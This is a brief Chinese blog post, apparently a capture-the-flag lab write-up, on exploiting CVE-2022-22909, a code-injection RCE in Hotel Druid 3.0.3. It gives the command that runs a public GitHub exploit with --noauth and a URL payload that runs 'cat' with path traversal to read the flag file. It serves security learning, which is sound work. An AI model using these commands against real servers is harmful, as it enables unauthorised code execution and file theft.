[春秋云镜]CVE-2022-22909

本文介绍了CVE-2022-22909漏洞,该漏洞可能导致远程代码执行。提供了一个GitHub资源链接用于研究,并详细说明了如何利用--noauth标志绕过身份验证访问靶场。通过特定URL成功读取到flag,强调了安全测试的重要性。
摘要由CSDN通过智能技术生成

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

前期准备工具

GitHub - 0z09e/CVE-2022-22909: Hotel Druid 3.0.3 Code Injection to Remote Code Execution

靶场地址

http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com

应用程序没有身份验证。运用该–noauth标志不履行身份验证。

 python exploit.py -t http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com/ --noauth  

读取flag

http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com/dati/selectappartamenti.php?1=cat%20../../../../../flag

成功获取flag


 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值